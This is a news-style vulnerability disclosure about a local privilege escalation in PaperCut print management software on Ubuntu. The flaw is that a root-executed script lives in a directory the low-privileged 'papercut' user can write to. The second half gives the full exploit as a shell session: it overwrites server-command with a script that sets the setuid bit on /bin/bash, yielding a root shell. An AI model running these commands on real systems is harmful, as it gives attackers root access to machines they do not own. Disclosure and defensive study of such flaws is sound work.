Security researcher has uncovered a critical flaw that could turn a lowly printer into a hotspot for hackers.
Martin Mielke, a security researcher, was probing the latest version of Papercut (version 22.0.12) installed on an Ubuntu 22.04 system.
Mielke’s installation was unassuming, utilizing a low-privileged user account named ‘papercut’. The crux of the issue lay in how Papercut handled certain web application functionalities. Mielke discovered that by accessing the application admin panel via port 9191 and navigating to a specific page, he could execute commands as the root user, despite being logged in with limited privileges.
This privilege escalation was possible due to a flaw in the execution of a script (`/bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key`). The script, residing in the directory of the ‘papercut’ user, could be replaced with any binary or shell script, allowing Mielke to execute arbitrary commands with root privileges.
Mielke has replaced the ‘server-command’ file with a script that altered the permissions of the bash shell, granting it setuid permissions in order to exploit. By doing so, any command run through the bash shell would execute with root privileges, effectively elevating the rights of the low-privileged ‘papercut’ user to that of the root user.
The implications of this discovery were alarming. Not only did it highlight a significant oversight in Papercut’s security architecture, but it also underscored the potential risks associated with seemingly benign software components. The vulnerability, reported six months prior, remained unaddressed in the latest version (23.0.3), raising concerns about the pace of security updates in critical software.
To execute the attack, run the following commands as the low-privileged “papercut” user:
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#
. `dirname $0`/.common
export CLASSPATH
${JRE_HOME}/bin/java \
-Djava.io.tmpdir=${TMP_DIR} \
-Dserver.home=${SERVER_HOME} \
-Djava.awt.headless=true \
-Djava.locale.providers=COMPAT,SPI \
-Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
-Xverify:none \
biz.papercut.pcng.server.ServerCommand \
"$@"
papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash
Nice 👌